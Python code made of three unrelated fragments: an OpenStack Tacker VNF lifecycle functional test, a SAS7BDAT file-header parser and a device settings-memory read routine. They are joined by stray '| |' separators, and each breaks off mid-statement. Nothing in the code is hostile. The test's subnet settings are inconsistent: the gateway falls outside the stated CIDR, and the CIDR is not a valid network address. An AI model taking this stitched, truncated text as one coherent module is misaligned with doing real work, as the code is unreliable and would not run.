if fixed_addresses:
ext_cp = get_ext_cp_with_fixed_address(
net_mgmt_resource_id, fixed_addresses, subnet_id)
else:
ext_cp = get_ext_cp_with_external_link_port(
net_mgmt_resource_id, port_uuid)
ext_vl.append(ext_cp)
return ext_vl
def _create_and_upload_vnf_package(tacker_client, csar_package_name,
user_defined_data):
# create vnf package
body = jsonutils.dumps({"userDefinedData": user_defined_data})
resp, vnf_package = tacker_client.do_request(
'/vnfpkgm/v1/vnf_packages', "POST", body=body)
# upload vnf package
csar_package_path = "../../../etc/samples/etsi/nfv/%s" % csar_package_name
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
csar_package_path))
# Generating unique vnfd id. This is required when multiple workers
# are running concurrently. The call below creates a new temporary
# CSAR with unique vnfd id.
file_path, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
with open(file_path, 'rb') as file_object:
resp, resp_body = tacker_client.do_request(
'/vnfpkgm/v1/vnf_packages/{id}/package_content'.format(
id=vnf_package['id']),
"PUT", body=file_object, content_type='application/zip')
# wait for onboard
timeout = VNF_PACKAGE_UPLOAD_TIMEOUT
start_time = int(time.time())
show_url = os.path.join('/vnfpkgm/v1/vnf_packages', vnf_package['id'])
vnfd_id = None
while True:
resp, body = tacker_client.do_request(show_url, "GET")
if body['onboardingState'] == "ONBOARDED":
vnfd_id = body['vnfdId']
break
if ((int(time.time()) - start_time) > timeout):
raise Exception("Failed to onboard vnf package")
time.sleep(1)
# remove temporarily created CSAR file
os.remove(file_path)
return vnf_package['id'], vnfd_id
class VnfLcmTest(base.BaseTackerTest):
@classmethod
def setUpClass(cls):
cls.tacker_client = base.BaseTackerTest.tacker_http_client()
cls.vnf_package_1, cls.vnfd_id_1 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm1", {"key": "sample_1_functional"})
cls.vnf_package_2, cls.vnfd_id_2 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm2", {"key": "sample_2_functional"})
cls.vnf_package_3, cls.vnfd_id_3 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm3", {"key": "sample_3_functional"})
super(VnfLcmTest, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# Update vnf package operational state to DISABLED
update_req_body = jsonutils.dumps({
"operationalState": "DISABLED"})
base_path = "/vnfpkgm/v1/vnf_packages"
for package_id in [cls.vnf_package_1, cls.vnf_package_2,
cls.vnf_package_3]:
resp, resp_body = cls.tacker_client.do_request(
'{base_path}/{id}'.format(id=package_id,
base_path=base_path),
"PATCH", content_type='application/json', body=update_req_body)
# Delete vnf package
url = '/vnfpkgm/v1/vnf_packages/%s' % package_id
cls.tacker_client.do_request(url, "DELETE")
super(VnfLcmTest, cls).tearDownClass()
def setUp(self):
super(VnfLcmTest, self).setUp()
self.base_url = "/vnflcm/v1/vnf_instances"
self.base_vnf_lcm_op_occs_url = "/vnflcm/v1/vnf_lcm_op_occs"
vim_list = self.client.list_vims()
if not vim_list:
self.skipTest("Vims are not configured")
vim_id = 'VIM0'
vim = self.get_vim(vim_list, vim_id)
if not vim:
self.skipTest("Default VIM '%s' is missing" % vim_id)
self.vim_id = vim['id']
def _instantiate_vnf_request(self, flavour_id,
instantiation_level_id=None, vim_id=None, ext_vl=None,
ext_managed_vl=None):
request_body = {"flavourId": flavour_id}
if instantiation_level_id:
request_body["instantiationLevelId"] = instantiation_level_id
if ext_managed_vl:
request_body["extManagedVirtualLinks"] = ext_managed_vl
if ext_vl:
request_body["extVirtualLinks"] = ext_vl
if vim_id:
request_body["vimConnectionInfo"] = [
{"id": uuidutils.generate_uuid(),
"vimId": vim_id,
"vimType": "ETSINFV.OPENSTACK_KEYSTONE.v_2"}]
return request_body
def _create_vnf_instance(self, vnfd_id, vnf_instance_name=None,
vnf_instance_description=None):
request_body = {'vnfdId': vnfd_id}
if vnf_instance_name:
request_body['vnfInstanceName'] = vnf_instance_name
if vnf_instance_description:
request_body['vnfInstanceDescription'] = vnf_instance_description
resp, response_body = self.http_client.do_request(
self.base_url, "POST", body=jsonutils.dumps(request_body))
return resp, response_body
def _delete_wait_vnf_instance(self, id):
timeout = VNF_TERMINATE_TIMEOUT
url = os.path.join(self.base_url, id)
start_time = int(time.time())
while True:
resp, body = self.http_client.do_request(url, "DELETE")
if 204 == resp.status_code:
break
if ((int(time.time()) - start_time) > timeout):
error = "Failed to delete vnf instance %s"
self.fail(error % id)
time.sleep(RETRY_WAIT_TIME)
def _delete_vnf_instance(self, id):
self._delete_wait_vnf_instance(id)
# verify vnf instance is deleted
url = os.path.join(self.base_url, id)
resp, body = self.http_client.do_request(url, "GET")
self.assertEqual(404, resp.status_code)
def _show_vnf_instance(self, id, expected_result=None):
show_url = os.path.join(self.base_url, id)
resp, vnf_instance = self.http_client.do_request(show_url, "GET")
self.assertEqual(200, resp.status_code)
if expected_result:
self.assertDictSupersetOf(expected_result, vnf_instance)
return vnf_instance
def _list_vnf_instances(self):
resp, vnf_instances = self.http_client.do_request(self.base_url, "GET")
self.assertEqual(200, resp.status_code)
return vnf_instances
def _stack_update_wait(self, stack_id, expected_status,
timeout=VNF_HEAL_TIMEOUT):
start_time = int(time.time())
while True:
stack = self.h_client.stacks.get(stack_id)
if stack.stack_status == expected_status:
break
if ((int(time.time()) - start_time) > timeout):
error = ("Stack %(id)s status is %(current)s, expected status "
"should be %(expected)s")
self.fail(error % {"id": stack_id, "current": stack.status,
"expected": expected_status})
time.sleep(RETRY_WAIT_TIME)
def _vnf_instance_wait(self, id,
instantiation_state=fields.VnfInstanceState.INSTANTIATED,
timeout=VNF_INSTANTIATE_TIMEOUT):
show_url = os.path.join(self.base_url, id)
start_time = int(time.time())
while True:
resp, body = self.http_client.do_request(show_url, "GET")
if body['instantiationState'] == instantiation_state:
break
if ((int(time.time()) - start_time) > timeout):
error = ("Vnf instance %(id)s status is %(current)s, "
"expected status should be %(expected)s")
self.fail(error % {"id": id,
"current": body['instantiationState'],
"expected": instantiation_state})
time.sleep(RETRY_WAIT_TIME)
def _create_network(self, neutron_client, network_name):
net = neutron_client.create_network(
{'network': {'name': "network-%s" % uuidutils.generate_uuid()}})
net_id = net['network']['id']
self.addCleanup(neutron_client.delete_network, net_id)
return net_id
def _create_subnet(self, neutron_client, network_id):
body = {'subnet': {'network_id': network_id,
'name': "subnet-%s" % uuidutils.generate_uuid(),
'cidr': "172.16.58.3/24",
'ip_version': 4,
'gateway_ip': '172.16.31.10',
"enable_dhcp": True}}
subnet = neutron_client.create_subnet(body=body)["subnet"]
self.addCleanup(neutron_client.delete_subnet, subnet['id'])
return subnet['id']
def _create_port(self, neutron_client, network_id):
body = {'port': {'network_id': network_id}}
port = neutron_client.create_port(body=body)["port"]
self.addCleanup(neutron_client.delete_port, port['id'])
return port['id']
def _instantiate_vnf_instance(self, id, request_body):
url = os.path.join(self.base_url, id, "instantiate")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
self._vnf_instance_wait(id)
def _terminate_vnf_instance(self, id, request_body):
url = os.path.join(self.base_url, id, "terminate")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
timeout = request_body.get('gracefulTerminationTimeout')
start_time = int(time.time())
self._vnf_instance_wait(id,
instantiation_state=fields.VnfInstanceState.NOT_INSTANTIATED,
timeout=VNF_TERMINATE_TIMEOUT)
# If gracefulTerminationTimeout is set, check whether vnf
# instantiation_state is set to NOT_INSTANTIATED after
# gracefulTerminationTimeout seconds.
if timeout and int(time.time()) - start_time < timeout:
self.fail("Vnf is terminated before graceful termination "
"timeout period")
def _heal_vnf_instance(self, vnf_instance, request_body,
expected_stack_status=infra_cnst.STACK_UPDATE_COMPLETE):
url = os.path.join(self.base_url, vnf_instance['id'], "heal")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
# Wait until tacker heals the stack resources as requested in
# in the heal request
self._stack_update_wait(stack.id, expected_stack_status)
def _heal_sol_003_vnf_instance(self, vnf_instance, request_body):
url = os.path.join(self.base_url, vnf_instance['id'], "heal")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
# If healing is done without vnfc components, it will delete the
# stack and create a new one. So wait until vnf is deleted and then
# wait until a new stack is created using vnfInstanceName and once
# the stack is created, wait until it's status becomes
# CREATE_COMPLETE.
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
self._stack_update_wait(stack.id, infra_cnst.STACK_DELETE_COMPLETE)
start_time = int(time.time())
timeout = VNF_INSTANTIATE_TIMEOUT
while True:
try:
stack = self.h_client.stacks.get(
vnf_instance['vnfInstanceName'])
if stack.stack_status == infra_cnst.STACK_CREATE_COMPLETE:
break
except Exception:
pass
if ((int(time.time()) - start_time) > timeout):
self.fail("Failed to heal vnf during instantiation")
def _get_server(self, server_id):
try:
self.novaclient().servers.get(server_id)
except Exception:
self.fail("Failed to get vdu resource %s id" % server_id)
def _verify_vnfc_resource_info(self, vnf_instance_old,
vnf_instance_current, vdu_count):
vnfc_resource_info_old = (vnf_instance_old['instantiatedVnfInfo']
['vnfcResourceInfo'])
vnfc_resource_info_current = (vnf_instance_current
['instantiatedVnfInfo']['vnfcResourceInfo'])
for index in range(vdu_count):
# compare computeResource resourceId is different
vdu_resource_id_old = (vnfc_resource_info_old[index]
['computeResource']['resourceId'])
vdu_resource_id_current = (vnfc_resource_info_current[index]
['computeResource']['resourceId'])
self.assertNotEqual(vdu_resource_id_old, vdu_resource_id_current)
# Now check whether vdus are healed properly and servers exists
# in nova.
self._get_server(vdu_resource_id_current)
def _change_ext_conn_vnf_request(self, vim_id=None, ext_vl=None):
request_body = {}
if ext_vl:
request_body["extVirtualLinks"] = ext_vl
if vim_id:
request_body["vimConnectionInfo"] = [
{"id": uuidutils.generate_uuid(),
"vimId": vim_id,
"vimType": "ETSINFV.OPENSTACK_KEYSTONE.v_2"}]
return request_body
def _change_ext_conn_vnf_instance(self, vnf_instance, request_body,
expected_stack_status=infra_cnst.STACK_UPDATE_COMPLETE):
url = os.path.join(self.base_url, vnf_instance['id'],
"change_ext_conn")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
# Wait until tacker changes the stack resources as requested
# in the change_ext_conn request
self._stack_update_wait(stack.id, expected_stack_status,
VNF_CHANGE_EXT_CONN_TIMEOUT)
def _get_heat_stack(self, vnf_instance_id, stack_name):
heatclient = self.heatclient()
try:
stacks = heatclient.stacks.list()
except Exception:
return None
target_stakcs = list(
filter(
lambda x: x.stack_name == stack_name,
stacks))
if len(target_stakcs) == 0:
return None
return target_stakcs[0]
def _get_heat_resource_info(self, stack_id, nested_depth=0,
resource_name=None):
heatclient = self.heatclient()
try:
if resource_name is None:
resources = heatclient.resources.list(stack_id,
nested_depth=nested_depth)
else:
resources | |
self.properties.lcs = self.parent._read_val('h', vals[lcs], 2)
self.properties.lcp = self.parent._read_val('h', vals[lcp], 2)
class ColumnSizeSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
vals = self.parent._read_bytes({
offset: self.int_length
})
if self.properties.column_count is not None:
self.logger.error('found more than one column count subheader')
self.properties.column_count = self.parent._read_val(
'i', vals[offset], self.int_length
)
if self.properties.col_count_p1 + self.properties.col_count_p2 !=\
self.properties.column_count:
self.logger.warning('column count mismatch')
class SubheaderCountsSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
pass # Not sure what to do here yet
class ColumnTextSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
vals = self.parent._read_bytes({
offset: self.TEXT_BLOCK_SIZE_LENGTH
})
text_block_size = self.parent._read_val(
'h', vals[offset], self.TEXT_BLOCK_SIZE_LENGTH
)
vals = self.parent._read_bytes({
offset: text_block_size
})
self.parent.column_names_strings.append(vals[offset])
if len(self.parent.column_names_strings) == 1:
column_name = self.parent.column_names_strings[0]
compression_literal = None
for cl in SAS7BDAT.COMPRESSION_LITERALS:
if cl in column_name:
compression_literal = cl
break
self.properties.compression = compression_literal
offset -= self.int_length
vals = self.parent._read_bytes({
offset + (20 if self.properties.u64 else 16): 8
})
compression_literal = self.parent._read_val(
's',
vals[offset + (20 if self.properties.u64 else 16)],
8
).strip()
if len(compression_literal) == 0:
self.properties.lcs = 0
vals = self.parent._read_bytes({
offset + 16 + (20 if self.properties.u64 else 16):
self.properties.lcp
})
creatorproc = self.parent._read_val(
's',
vals[offset + 16 + (20 if self.properties.u64 else 16)],
self.properties.lcp
)
self.properties.creator_proc = creatorproc
elif compression_literal == SAS7BDAT.RLE_COMPRESSION:
vals = self.parent._read_bytes({
offset + 24 + (20 if self.properties.u64 else 16):
self.properties.lcp
})
creatorproc = self.parent._read_val(
's',
vals[offset + 24 + (20 if self.properties.u64 else 16)],
self.properties.lcp
)
self.properties.creator_proc = creatorproc
elif self.properties.lcs > 0:
self.properties.lcp = 0
vals = self.parent._read_bytes({
offset + (20 if self.properties.u64 else 16):
self.properties.lcs
})
creator = self.parent._read_val(
's',
vals[offset + (20 if self.properties.u64 else 16)],
self.properties.lcs
)
self.properties.creator = creator
class ColumnNameSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
column_name_pointers_count = (length - 2 * self.int_length - 12) // 8
for i in xrange(column_name_pointers_count):
text_subheader = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_TEXT_SUBHEADER_OFFSET
)
col_name_offset = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_OFFSET_OFFSET
)
col_name_length = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_LENGTH_OFFSET
)
vals = self.parent._read_bytes({
text_subheader: self.COLUMN_NAME_TEXT_SUBHEADER_LENGTH,
col_name_offset: self.COLUMN_NAME_OFFSET_LENGTH,
col_name_length: self.COLUMN_NAME_LENGTH_LENGTH,
})
idx = self.parent._read_val(
'h', vals[text_subheader],
self.COLUMN_NAME_TEXT_SUBHEADER_LENGTH
)
col_offset = self.parent._read_val(
'h', vals[col_name_offset],
self.COLUMN_NAME_OFFSET_LENGTH
)
col_len = self.parent._read_val(
'h', vals[col_name_length],
self.COLUMN_NAME_LENGTH_LENGTH
)
name_str = self.parent.column_names_strings[idx]
self.parent.column_names.append(
name_str[col_offset:col_offset + col_len]
)
if i == 0:
self.properties.label = name_str[36+8*(self.properties.compression is not None):col_offset]
class ColumnAttributesSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
int_len = self.int_length
column_attributes_vectors_count = (
(length - 2 * int_len - 12) // (int_len + 8)
)
for i in xrange(column_attributes_vectors_count):
col_data_offset = (
offset + int_len + self.COLUMN_DATA_OFFSET_OFFSET + i *
(int_len + 8)
)
col_data_len = (
offset + 2 * int_len + self.COLUMN_DATA_LENGTH_OFFSET + i *
(int_len + 8)
)
col_types = (
offset + 2 * int_len + self.COLUMN_TYPE_OFFSET + i *
(int_len + 8)
)
vals = self.parent._read_bytes({
col_data_offset: int_len,
col_data_len: self.COLUMN_DATA_LENGTH_LENGTH,
col_types: self.COLUMN_TYPE_LENGTH,
})
self.parent.column_data_offsets.append(self.parent._read_val(
'i', vals[col_data_offset], int_len
))
self.parent.column_data_lengths.append(self.parent._read_val(
'i', vals[col_data_len], self.COLUMN_DATA_LENGTH_LENGTH
))
ctype = self.parent._read_val(
'b', vals[col_types], self.COLUMN_TYPE_LENGTH
)
self.parent.column_types.append(
'number' if ctype == 1 else 'string'
)
class FormatAndLabelSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
int_len = self.int_length
text_subheader_format = (
offset + self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_OFFSET + 3 *
int_len
)
col_format_offset = (
offset + self.COLUMN_FORMAT_OFFSET_OFFSET + 3 * int_len
)
col_format_len = (
offset + self.COLUMN_FORMAT_LENGTH_OFFSET + 3 * int_len
)
text_subheader_label = (
offset + self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_OFFSET + 3 *
int_len
)
col_label_offset = (
offset + self.COLUMN_LABEL_OFFSET_OFFSET + 3 * int_len
)
col_label_len = (
offset + self.COLUMN_LABEL_LENGTH_OFFSET + 3 * int_len
)
vals = self.parent._read_bytes({
text_subheader_format:
self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_LENGTH,
col_format_offset: self.COLUMN_FORMAT_OFFSET_LENGTH,
col_format_len: self.COLUMN_FORMAT_LENGTH_LENGTH,
text_subheader_label:
self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_LENGTH,
col_label_offset: self.COLUMN_LABEL_OFFSET_LENGTH,
col_label_len: self.COLUMN_LABEL_LENGTH_LENGTH,
})
# min used to prevent incorrect data which appear in some files
format_idx = min(
self.parent._read_val(
'h', vals[text_subheader_format],
self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_LENGTH
),
len(self.parent.column_names_strings) - 1
)
format_start = self.parent._read_val(
'h', vals[col_format_offset],
self.COLUMN_FORMAT_OFFSET_LENGTH
)
format_len = self.parent._read_val(
'h', vals[col_format_len],
self.COLUMN_FORMAT_LENGTH_LENGTH
)
# min used to prevent incorrect data which appear in some files
label_idx = min(
self.parent._read_val(
'h', vals[text_subheader_label],
self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_LENGTH,
),
len(self.parent.column_names_strings) - 1
)
label_start = self.parent._read_val(
'h', vals[col_label_offset],
self.COLUMN_LABEL_OFFSET_LENGTH
)
label_len = self.parent._read_val(
'h', vals[col_label_len],
self.COLUMN_LABEL_LENGTH_LENGTH
)
label_names = self.parent.column_names_strings[label_idx]
column_label = label_names[label_start:label_start + label_len]
format_names = self.parent.column_names_strings[format_idx]
column_format = format_names[format_start:format_start + format_len]
current_column_number = len(self.parent.columns)
self.parent.columns.append(
Column(current_column_number,
self.parent.column_names[current_column_number],
column_label,
column_format,
self.parent.column_types[current_column_number],
self.parent.column_data_lengths[current_column_number])
)
class ColumnListSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
pass # Not sure what to do with this yet
class DataSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
self.parent.current_row = self.parent._process_byte_array_with_data(
offset, length
)
class SASProperties(object):
def __init__(self):
self.u64 = False
self.endianess = None
self.platform = None
self.name = None
self.label = None
self.file_type = None
self.date_created = None
self.date_modified = None
self.header_length = None
self.page_length = None
self.page_count = None
self.sas_release = None
self.server_type = None
self.os_type = None
self.os_name = None
self.compression = None
self.row_length = None
self.row_count = None
self.col_count_p1 = None
self.col_count_p2 = None
self.mix_page_row_count = None
self.lcs = None
self.lcp = None
self.creator = None
self.creator_proc = None
self.column_count = None
self.filename = None
class SASHeader(object):
MAGIC = b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xc2\xea\x81\x60' \
b'\xb3\x14\x11\xcf\xbd\x92\x08\x00' \
b'\x09\xc7\x31\x8c\x18\x1f\x10\x11'
ROW_SIZE_SUBHEADER_INDEX = 'row_size'
COLUMN_SIZE_SUBHEADER_INDEX = 'column_size'
SUBHEADER_COUNTS_SUBHEADER_INDEX = 'subheader_counts'
COLUMN_TEXT_SUBHEADER_INDEX = 'column_text'
COLUMN_NAME_SUBHEADER_INDEX = 'column_name'
COLUMN_ATTRIBUTES_SUBHEADER_INDEX = 'column_attributes'
FORMAT_AND_LABEL_SUBHEADER_INDEX = 'format_and_label'
COLUMN_LIST_SUBHEADER_INDEX = 'column_list'
DATA_SUBHEADER_INDEX = 'data'
# Subheader signatures, 32 and 64 bit, little and big endian
SUBHEADER_SIGNATURE_TO_INDEX = {
b'\xF7\xF7\xF7\xF7': ROW_SIZE_SUBHEADER_INDEX,
b'\x00\x00\x00\x00\xF7\xF7\xF7\xF7': ROW_SIZE_SUBHEADER_INDEX,
b'\xF7\xF7\xF7\xF7\x00\x00\x00\x00': ROW_SIZE_SUBHEADER_INDEX,
b'\xF6\xF6\xF6\xF6': COLUMN_SIZE_SUBHEADER_INDEX,
b'\x00\x00\x00\x00\xF6\xF6\xF6\xF6': COLUMN_SIZE_SUBHEADER_INDEX,
b'\xF6\xF6\xF6\xF6\x00\x00\x00\x00': COLUMN_SIZE_SUBHEADER_INDEX,
b'\x00\xFC\xFF\xFF': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFF\xFF\xFC\x00': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\x00\xFC\xFF\xFF\xFF\xFF\xFF\xFF': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFC\x00': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFD\xFF\xFF\xFF': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFD': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFD\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFD': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF': COLUMN_NAME_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_NAME_SUBHEADER_INDEX,
b'\xFC\xFF\xFF\xFF': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFC': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFC\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFE\xFB\xFF\xFF': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFF\xFF\xFB\xFE': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFE\xFB\xFF\xFF\xFF\xFF\xFF\xFF': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFB\xFE': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFE\xFF\xFF\xFF': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFE': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFE': COLUMN_LIST_SUBHEADER_INDEX,
}
SUBHEADER_INDEX_TO_CLASS = {
ROW_SIZE_SUBHEADER_INDEX: RowSizeSubheader,
COLUMN_SIZE_SUBHEADER_INDEX: ColumnSizeSubheader,
SUBHEADER_COUNTS_SUBHEADER_INDEX: SubheaderCountsSubheader,
COLUMN_TEXT_SUBHEADER_INDEX: ColumnTextSubheader,
COLUMN_NAME_SUBHEADER_INDEX: ColumnNameSubheader,
COLUMN_ATTRIBUTES_SUBHEADER_INDEX: ColumnAttributesSubheader,
FORMAT_AND_LABEL_SUBHEADER_INDEX: FormatAndLabelSubheader,
COLUMN_LIST_SUBHEADER_INDEX: ColumnListSubheader,
DATA_SUBHEADER_INDEX: DataSubheader,
}
ALIGN_1_CHECKER_VALUE = b'3'
ALIGN_1_OFFSET = 32
ALIGN_1_LENGTH = 1
ALIGN_1_VALUE = 4
U64_BYTE_CHECKER_VALUE = b'3'
ALIGN_2_OFFSET = 35
ALIGN_2_LENGTH = 1
ALIGN_2_VALUE = 4
ENDIANNESS_OFFSET = 37
ENDIANNESS_LENGTH = 1
PLATFORM_OFFSET = 39
PLATFORM_LENGTH = 1
DATASET_OFFSET = 92
DATASET_LENGTH = 64
FILE_TYPE_OFFSET = 156
FILE_TYPE_LENGTH = 8
DATE_CREATED_OFFSET = 164
DATE_CREATED_LENGTH = 8
DATE_MODIFIED_OFFSET = 172
DATE_MODIFIED_LENGTH = 8
HEADER_SIZE_OFFSET = 196
HEADER_SIZE_LENGTH = 4
PAGE_SIZE_OFFSET = 200
PAGE_SIZE_LENGTH = 4
PAGE_COUNT_OFFSET = 204
PAGE_COUNT_LENGTH = 4
SAS_RELEASE_OFFSET = 216
SAS_RELEASE_LENGTH = 8
SAS_SERVER_TYPE_OFFSET = 224
SAS_SERVER_TYPE_LENGTH = 16
OS_VERSION_NUMBER_OFFSET = 240
OS_VERSION_NUMBER_LENGTH = 16
OS_MAKER_OFFSET = 256
OS_MAKER_LENGTH = 16
OS_NAME_OFFSET = 272
OS_NAME_LENGTH = 16
PAGE_BIT_OFFSET_X86 = 16
PAGE_BIT_OFFSET_X64 = 32
SUBHEADER_POINTER_LENGTH_X86 = 12
SUBHEADER_POINTER_LENGTH_X64 = 24
PAGE_TYPE_OFFSET = 0
PAGE_TYPE_LENGTH = 2
BLOCK_COUNT_OFFSET = 2
BLOCK_COUNT_LENGTH = 2
SUBHEADER_COUNT_OFFSET = 4
SUBHEADER_COUNT_LENGTH = 2
PAGE_META_TYPE = 0
PAGE_DATA_TYPE = 256
PAGE_MIX_TYPE = [512, 640]
PAGE_AMD_TYPE = 1024
PAGE_METC_TYPE = 16384
PAGE_COMP_TYPE = -28672
PAGE_MIX_DATA_TYPE = PAGE_MIX_TYPE + [PAGE_DATA_TYPE]
PAGE_META_MIX_AMD = [PAGE_META_TYPE] + PAGE_MIX_TYPE + [PAGE_AMD_TYPE]
PAGE_ANY = PAGE_META_MIX_AMD +\
[PAGE_DATA_TYPE, PAGE_METC_TYPE, PAGE_COMP_TYPE]
SUBHEADER_POINTERS_OFFSET = 8
TRUNCATED_SUBHEADER_ID = 1
COMPRESSED_SUBHEADER_ID = 4
COMPRESSED_SUBHEADER_TYPE = 1
def __init__(self, parent):
self.parent = parent
self.properties = SASProperties()
self.properties.filename = os.path.basename(parent.path)
# Check magic number
h = parent.cached_page = parent._file.read(288)
if len(h) < 288:
parent.logger.error('header too short (not a sas7bdat file?)')
return
if not self.check_magic_number(h):
parent.logger.error('magic number mismatch')
return
align1 = 0
align2 = 0
offsets_and_lengths = {
self.ALIGN_1_OFFSET: self.ALIGN_1_LENGTH,
self.ALIGN_2_OFFSET: self.ALIGN_2_LENGTH,
}
align_vals = parent._read_bytes(offsets_and_lengths)
if align_vals[self.ALIGN_1_OFFSET] == self.U64_BYTE_CHECKER_VALUE:
align2 = self.ALIGN_2_VALUE
self.properties.u64 = True
if align_vals[self.ALIGN_2_OFFSET] == self.ALIGN_1_CHECKER_VALUE:
align1 = self.ALIGN_1_VALUE
total_align = align1 + align2
offsets_and_lengths = {
self.ENDIANNESS_OFFSET: self.ENDIANNESS_LENGTH,
self.PLATFORM_OFFSET: self.PLATFORM_LENGTH,
self.DATASET_OFFSET: self.DATASET_LENGTH,
self.FILE_TYPE_OFFSET: self.FILE_TYPE_LENGTH,
self.DATE_CREATED_OFFSET + align1: self.DATE_CREATED_LENGTH,
self.DATE_MODIFIED_OFFSET + align1: self.DATE_MODIFIED_LENGTH,
self.HEADER_SIZE_OFFSET + align1: self.HEADER_SIZE_LENGTH,
self.PAGE_SIZE_OFFSET + align1: self.PAGE_SIZE_LENGTH,
self.PAGE_COUNT_OFFSET + align1: self.PAGE_COUNT_LENGTH + align2,
self.SAS_RELEASE_OFFSET + total_align: self.SAS_RELEASE_LENGTH,
self.SAS_SERVER_TYPE_OFFSET + total_align:
self.SAS_SERVER_TYPE_LENGTH,
self.OS_VERSION_NUMBER_OFFSET + total_align:
self.OS_VERSION_NUMBER_LENGTH,
self.OS_MAKER_OFFSET + total_align: self.OS_MAKER_LENGTH,
self.OS_NAME_OFFSET + total_align: self.OS_NAME_LENGTH,
}
vals = parent._read_bytes(offsets_and_lengths)
self.properties.endianess = 'little'\
if vals[self.ENDIANNESS_OFFSET] == b'\x01' else 'big'
parent.endianess = self.properties.endianess
if vals[self.PLATFORM_OFFSET] == b'1':
self.properties.platform = 'unix'
elif vals[self.PLATFORM_OFFSET] == b'2':
self.properties.platform = 'windows'
else:
self.properties.platform = 'unknown'
self.properties.name = parent._read_val(
's', vals[self.DATASET_OFFSET], self.DATASET_LENGTH
)
self.properties.file_type = parent._read_val(
's', vals[self.FILE_TYPE_OFFSET], | |
if (count > 512 or address > 0x1ff):
return False
dataCount = 4
replyCount = count
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_SETTINGS_MEMORY_R
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
s_buffer[MSG_INDEX_DATA+2] = count & 0xff
s_buffer[MSG_INDEX_DATA+3] = (count>>8) & 0xff
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
